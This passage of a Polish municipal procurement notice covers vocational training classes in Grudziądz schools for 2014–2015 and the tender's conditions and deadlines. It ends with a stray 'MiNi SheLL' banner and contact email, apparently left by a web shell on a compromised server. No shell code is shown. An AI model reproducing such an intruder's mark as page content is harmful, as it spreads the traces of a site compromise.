Część 47. Zajęcia specjalistyczne U króla Stasia - obiady czwartkowe- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Program zajęć oparty o literaturę: M. Lemnis, H. Vitry, W staropolskiej kuchni i przy polskim stole, B. Jakimowicz-Klein, J. Tomkowski: Kuchnia Literacka. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 48. Zajęcia specjalistyczne U króla Stasia - obiady czwartkowe- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 49. Zajęcia specjalistyczne Wielkanoc na polskim stole- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 50. Zajęcia specjalistyczne Wielkanoc na polskim stole- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.
Część 51. Zajęcia specjalistyczne Wielkanoc na polskim stole- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.		
Część 52. Zajęcia specjalistyczne Wielkanoc na polskim stole- zajęcia w zakresie programowym dla zawodu kucharz zintegrowane z treściami z języka polskiego. Łącznie - 10 h dla grupy 16 uczniów. Miejsce: Zespół Szkół Gastronomiczno-Hotelarskich w Grudziądzu ul. Curie-Skłodowskiej 22-24. Termin realizacji: od 2 września 2014r. do 20 czerwca 2015r.	
Część 53. Zajęcia specjalistyczne w zakresie spawania elektrycznego metodą TIG (141). Łącznie  220 h dla 16 uczniów. Miejsce: Zespół Szkół Mechanicznych ul. Hallera 31, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Część 54. Zajęcia specjalistyczne w zakresie środków ochrony roślin (część praktyczna). Łącznie 5 h dla grupy 20 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Cześć 55. Zajęcia specjalistyczne w zakresie środków ochrony roślin (część teoretyczna). Łącznie 9 h dla grupy 20 uczniów. Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.	
Część 56. Zajęcia specjalistyczne w zakresie środków ochrony roślin (część praktyczna). Łącznie 5 h dla grupy 20 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Cześć 57. Zajęcia specjalistyczne w zakresie środków ochrony roślin (część teoretyczna). Łącznie 9 h dla grupy 20 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Cześć 58. Zajęcia specjalistyczne w zakresie florystyki dla zawodu architekt krajobrazu. Łącznie 50 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Cześć 59. Zajęcia specjalistyczne w zakresie florystyki dla zawodu architekt krajobrazu. Łącznie 50 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Cześć 60. Zajęcia specjalistyczne w zakresie florystyki dla zawodu architekt krajobrazu. Łącznie 50 h dla grupy 10 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Cześć 61. Zajęcia specjalistyczne w zakresie nauki jazdy ciągnikiem. Łącznie 482 h dla grupy 24 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.
Cześć 62. Zajęcia specjalistyczne w zakresie obsługi kombajnu. Łącznie 85 h dla grupy 15 uczniów. Miejsce: Zespół Szkół Rolniczych ul. Lipowa 33, 86-300 Grudziądz. Termin realizacji: od 2 września do 20 czerwca 2015r.	
Wykonawca może złożyć ofertę na dowolną ilość części zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 62.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków. Zamawiający dokona oceny spełnienia warunków na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w punkcie 6.1.a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków. Zamawiający dokona oceny spełnienia warunków na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w punkcie 6.1.a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków. Zamawiający dokona oceny spełnienia warunków na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w punkcie 6.1.a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków. Zamawiający dokona oceny spełnienia warunków na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w punkcie 6.1.a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków. Zamawiający dokona oceny spełnienia warunków na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w punkcie 6.1.a) SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną (osoby nie wymienione) w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii notarialnie poświadczonej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2014 godzina 10:00, miejsce: Biuro Zamówień Publicznych Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie, faksem na numer: 56 45 10 233 lub drogą elektroniczną na adres e-mail: bzp@um.grudziadz.pl. Każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt otrzymania oświadczeń, wniosków, zawiadomień oraz informacji faksem lub drogą elektroniczną. Termin wykonania zamówienia - od 2 września 2014 r. do 20 czerwca 2015 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com